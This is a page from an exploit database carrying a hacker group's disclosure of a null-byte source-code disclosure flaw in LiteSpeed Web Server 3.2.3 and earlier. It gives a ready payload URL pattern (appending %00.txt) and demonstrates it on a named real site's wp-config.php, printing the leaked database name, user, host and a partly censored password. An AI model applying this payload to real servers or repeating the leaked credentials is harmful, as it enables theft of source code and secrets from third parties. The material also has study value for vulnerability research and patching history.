0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LiteSpeed Web Server <= 3.2.3 Remote Source Code Disclosure Vuln
[================================================================
LiteSpeed Web Server <= 3.2.3 Remote Source Code Disclosure Vuln
================================================================
########################################################################################
########### _______ __ _____ ___ __ ###########
########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ###########
########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ###########
########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ###########
########### ###########
########### TheDefaced.org ###########
########### TheDefaced Security Team Presents An 0-day. ###########
########### LiteSpeed Remote Mime Type Injection ###########
########### Discovered by:Tr3mbl3r ###########
########### Shouts to his kitty kats and tacos. ###########
########################################################################################
# Product: #
# LiteSpeed/Discovered in <==3.2.3 Should work in all other versions below. #
# #
# Vuln: #
# Remote Mime Type Injection #
# #
# Description: #
# Litespeed will parse an URL/Files mimetype incorrectly. #
# When given a nullbyte. #
# #
# Patch: #
# Upgrade to LiteSpeed 3.2.4 has just been released today. #
# 9:15AM PST OCT 22 When I wrote this it's now 9:30AM PST OCT 22 #
# #
# This vuln was found before an update was released they fixed it after they found it..#
# In their logs. #
# #
# Risk: Extremely High #
########################################################################################
# Example: #
# Basicly if you had a URL like so http://www.site.com/index.php. #
# And you wanted this websites source you could simply add a nullbyte and an extension #
# Like So http://www.site.com/index.php%00.txt #
# Litespeed would then at this point asume the file is a txt file. #
# #
# Keep in mind that this vuln is Mime Type Injection... so it works with any type. #
# Like if you did %00.rar it would asume the index.php was a rar file. #
# Theres a numerous ammount of things you could do. #
# #
# As to of why litespeed does this is not confirmed by us just yet. #
# #
# I asume it has somthing to do with mimetype handling thus the name of the exploit. #
# MimeType Injection. #
########################################################################################
# An Example of This Vuln being put in to use. #
# #
# The Following is WordPress.com's Wp-Config.php #
# http://wordpress.com/wp-config.php%00.txt #
########################################################################################
# ###########
# <?php #
# #
# // This is probably useless? #
# define('DB_NAME', 'wpmu'); // The name of the database #
# define('DB_USER', 'wpmu'); // Your MySQL username #
# define('DB_PASSWORD', 'JTO5T**CENSOR-HERE**'); // ...and password #
# define('DB_HOST', 'two.wordpress.com'); // 99% chance you won't need to change this value #
# #
# require('define.php'); #
# #
# require(ABSPATH . 'wpmu-settings.php'); #
# #
# ?> #
# #
##################################################################################################
# Contact Us #
##################################################################################################
# 0day.today [2024-11-14] #